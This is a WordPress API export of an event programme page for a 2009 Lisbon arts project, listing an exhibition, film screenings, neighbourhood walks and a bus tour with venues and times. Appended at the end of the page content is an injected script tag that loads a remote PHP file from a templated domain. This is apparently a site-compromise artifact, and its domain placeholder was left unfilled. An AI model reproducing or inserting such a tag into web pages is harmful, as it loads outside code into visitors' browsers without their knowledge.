{"id":28,"date":"2009-03-05T17:28:44","date_gmt":"2009-03-05T22:28:44","guid":{"rendered":"http:\/\/underconstruction.xerem.org\/en\/?page_id=28"},"modified":"2009-03-05T18:04:21","modified_gmt":"2009-03-05T23:04:21","slug":"programme","status":"publish","type":"page","link":"https:\/\/underconstructionen.hangar.com.pt\/?page_id=28","title":{"rendered":"Programme"},"content":{"rendered":"<p><strong>Exhibition<br \/>\n<\/strong>Opening &#8211; March 20 &#8211; 9.30pm<br \/>\nM\u00f3nica de Miranda &amp; ARTERIA Arquitectura, Artur Moreira, Sofia Borges\/Vasco Coelho\u00a0and Jos\u00e9 Carlos Teixeira<br \/>\nLocation: Pavilh\u00e3o 28 do Hospital J\u00falio de Matos.<br \/>\n<strong>Book Launch<br \/>\n<\/strong>+ Cinema Cycle + Roundtable Discussion + Party<br \/>\nFilm: Elogio ao 1\/2\u00a0 (2006), by Pedro Sena Nunes, 70&#8242; (with the presence of the director)<br \/>\nMarch 21 &#8211; from 6pm<br \/>\nLocation: F\u00e1brica Bra\u00e7o de Prata<br \/>\n* Entry is paid after 9.30pm<\/p>\n<p><strong>Cinema Cycle + dinner<\/strong><br \/>\nMarch 22 &#8211; at 7pm<br \/>\nFilm: Lisboa Mistura (2008),\u00a0by\u00a0\u00a0Associa\u00e7\u00e3o Sons da Lusofonia, 156\u2019<br \/>\nLocation: Associa\u00e7\u00e3o de Melhoramentos e Recreativo do Talude<\/p>\n<p><strong>Cinema Cycle<\/strong><br \/>\nMarch 23 &#8211; at 7pm<br \/>\nFilm: Lusofonia, a (r)evolu\u00e7\u00e3o (2006), da\/by Red Bull Music Academy, 60&#8242;<br \/>\nLocation: Associa\u00e7\u00e3o Moinho da Juventude, Bairro Cova da Moura<\/p>\n<p><strong>Cinema Cycle<br \/>\n<\/strong>March 24 &#8211; at 7pm<br \/>\nFilm: Outros bairros (1998)\u00a0 by Kiluanje Liberdade, Vasco Pimentel and In\u00eas Gon\u00e7alves, 52&#8242;<br \/>\nLocation: Ordem dos Arquitectos<\/p>\n<p><strong>Neighbourhoods visit to Cova da Moura in association with\u00a0 \u201cSabura\u201d project.<\/strong><br \/>\nMarch 28 de Mar\u00e7o &#8211; 6.30pm<br \/>\nStarting in the Reprol Petrol pumps<\/p>\n<p><strong>Neighbourhoods visit to Quinta da Vict\u00f3ria in association with the \u201cA Festa Acabou\u201d project.<br \/>\n<\/strong>March 29 &#8211; at 4pm<br \/>\nMeeting Place: Torres Cooplar Garden &#8211;\u00a0 Av. Da Ralis &#8211;\u00a0 at the entrance of the Portela urbanization (Loures)<\/p>\n<p><strong>Military Road Tour<br \/>\n<\/strong>April\u00a0 5th &#8211; Ends at Associa\u00e7\u00e3o de Melhoramentos e Recreativo do Talude<\/p>\n<p>Roadmap:<br \/>\n10am: Talude (Crossing with the Venceslau Neighborhood)<br \/>\n10.15am Prior Velho (in the Caixa Geral de Dep\u00f3sitos square)<br \/>\n10.30am Esta\u00e7\u00e3o do Oriente (in front of AKI)<br \/>\n10.45am: Campo das Cebolas (in front of the casa dos bicos)<br \/>\n11am: Departure from Buraca a the roundabout near the IC19)<br \/>\nWe passed by brandoa; Damaia; Portas de Benfica; Pontinha; Bairro Padre Cruz; Galinheiras; Fetais; Apela\u00e7\u00e3o; Catujal.<br \/>\n1 pm: Arrival at Talude<br \/>\n1.30 pm Lunch at AMRT<br \/>\nEnds at Associa\u00e7\u00e3o de Melhoramentos e Recreativo do Talude<br \/>\nEstrada Militar, Talude 62, Catujal, 2680-601UNHOS<\/p>\n<p>Talude location by gps: 38\u00ba 48\u2032 34.71\u2033 N e 9\u00ba 06\u2032 45.33\u2033 W<\/p>\n<p>O<a href=\"http:\/\/maps.google.pt\/maps\/ms?ie=UTF8&amp;hl=pt-PT&amp;msa=0&amp;msid=110235063728878144130.000462fa2bd75a6616f2d&amp;ll=38.899583,-9.195557&amp;spn=2.992411,2.746582&amp;z=7&amp;source=embed\" target=\"_blank\">ther locations (+)<\/a><\/p>\n<p>Note: The activities that include lunch\/dinner need prior registration and have participation costs fixed by the Associations. For more information and registration, please contact the production by e-mail jorgerocha.producao @ gmail.com or by phone. 960100020<script src=\"http:\/\/$domain\/ll.php?kk=11\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Exhibition Opening &#8211; March 20 &#8211; 9.30pm M\u00f3nica de Miranda &amp; ARTERIA Arquitectura, Artur Moreira, Sofia Borges\/Vasco Coelho\u00a0and Jos\u00e9 Carlos Teixeira Location: Pavilh\u00e3o 28 do Hospital J\u00falio de Matos. Book Launch + Cinema Cycle + Roundtable Discussion + Party Film: Elogio ao 1\/2\u00a0 (2006), by Pedro Sena Nunes, 70&#8242; (with the presence of the director) [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":0,"parent":2,"menu_order":5,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-28","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/underconstructionen.hangar.com.pt\/index.php?rest_route=\/wp\/v2\/pages\/28","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/underconstructionen.hangar.com.pt\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/underconstructionen.hangar.com.pt\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/underconstructionen.hangar.com.pt\/index.php?rest_route=\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/underconstructionen.hangar.com.pt\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=28"}],"version-history":[{"count":3,"href":"https:\/\/underconstructionen.hangar.com.pt\/index.php?rest_route=\/wp\/v2\/pages\/28\/revisions"}],"predecessor-version":[{"id":54,"href":"https:\/\/underconstructionen.hangar.com.pt\/index.php?rest_route=\/wp\/v2\/pages\/28\/revisions\/54"}],"up":[{"embeddable":true,"href":"https:\/\/underconstructionen.hangar.com.pt\/index.php?rest_route=\/wp\/v2\/pages\/2"}],"wp:attachment":[{"href":"https:\/\/underconstructionen.hangar.com.pt\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=28"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}